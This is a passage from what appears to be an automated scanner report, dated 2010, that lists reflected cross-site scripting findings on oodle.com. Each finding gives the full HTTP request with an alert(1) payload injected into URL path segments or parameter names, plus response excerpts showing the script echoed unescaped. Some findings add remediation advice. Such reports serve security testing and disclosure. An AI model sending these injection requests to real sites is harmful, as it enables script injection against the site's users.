Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMDMxO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 46444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/?cc5be"><script>alert(1)</script>54f964f95d1=1" />
...[SNIP]...

1.243. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /browse/-/social_circle_all/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6127"-alert(1)-"a678d9503d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browsec6127"-alert(1)-"a678d9503d9/-/social_circle_all/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:34:30 GMT
Content-Length: 18649
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjcwO30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
xtraFields = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds browsec6127"-alert(1)-"a678d9503d9/-/social_circle_all/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.244. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /browse/-/social_circle_all/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd8b"><script>alert(1)</script>962195aab20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse4bd8b"><script>alert(1)</script>962195aab20/-/social_circle_all/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:34:29 GMT
Content-Length: 18723
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjY5O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/browse4bd8b"><script>alert(1)</script>962195aab20/-/social_circle_all/" />
...[SNIP]...

1.245. http://www.oodle.com/browse/-/social_circle_all/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /browse/-/social_circle_all/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e368"><script>alert(1)</script>f8526cc3d79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/9e368"><script>alert(1)</script>f8526cc3d79/social_circle_all/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:34:30 GMT
Content-Length: 23978
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjcwO30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/browse/9e368"><script>alert(1)</script>f8526cc3d79/social_circle_all/" />
...[SNIP]...

1.246. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c56"-alert(1)-"ee7e3a7ae52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro80c56"-alert(1)-"ee7e3a7ae52/fb-follow/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:33 GMT
Content-Length: 18583
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjE0O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
lyExtraFields = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds pro80c56"-alert(1)-"ee7e3a7ae52/fb-follow/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.247. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a095"><script>alert(1)</script>9fb41edefe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro2a095"><script>alert(1)</script>9fb41edefe9/fb-follow/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:32 GMT
Content-Length: 18667
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEyO30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro2a095"><script>alert(1)</script>9fb41edefe9/fb-follow/" />
...[SNIP]...

1.248. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5aa1d"-alert(1)-"f251f51b74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro/fb-follow5aa1d"-alert(1)-"f251f51b74e/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:35 GMT
Content-Length: 12342
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjE1O30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
lds = "houston-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds pro/fb-follow5aa1d"-alert(1)-"f251f51b74e/","10000000","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.249. http://www.oodle.com/pro/fb-follow/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c9aa"><script>alert(1)</script>f8d17b7843f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro/fb-follow1c9aa"><script>alert(1)</script>f8d17b7843f/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:34 GMT
Content-Length: 12401
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEzO30%3D; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro/fb-follow1c9aa"><script>alert(1)</script>f8d17b7843f/" />
...[SNIP]...

1.250. http://www.oodle.com/pro/fb-follow/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ed8e"-alert(1)-"545a0086820 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pro/fb-follow/?3ed8e"-alert(1)-"545a0086820=1 HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:32 GMT
Content-Length: 10025
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEyO30%3D; path=/; domain=.oodle.com

{"profile_html":"<div class=\"profile-polaroid\">\n\t<div class=\"profile-polaroid-pic\">\n\t\t\t<img src=\"http:\/\/i.oodleimg.com\/a\/account\/facebook_silhouette.gif\" width=\"50\" height=\"50\"\/>
...[SNIP]...
-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("nonclassifieds pro/fb-follow/?3ed8e"-alert(1)-"545a0086820=1","10000000","","","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.251. http://www.oodle.com/pro/fb-follow/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/fb-follow/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335f8"><script>alert(1)</script>b6b7ff9456b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pro/fb-follow/?335f8"><script>alert(1)</script>b6b7ff9456b=1 HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:33:26 GMT
Content-Length: 10105
Connection: close
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA2O30%3D; path=/; domain=.oodle.com

{"profile_html":"<div class=\"profile-polaroid\">\n\t<div class=\"profile-polaroid-pic\">\n\t\t\t<img src=\"http:\/\/i.oodleimg.com\/a\/account\/facebook_silhouette.gif\" width=\"50\" height=\"50\"\/>
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/pro/fb-follow/?335f8"><script>alert(1)</script>b6b7ff9456b=1" />
...[SNIP]...

1.252. http://www.oodle.com/pro/register/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /pro/register/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4ae7"-alert(1)-"7616b8adb5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /prod4ae7"-alert(1)-"7616b8adb5d/register/ HTTP/1.1
Host: www.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
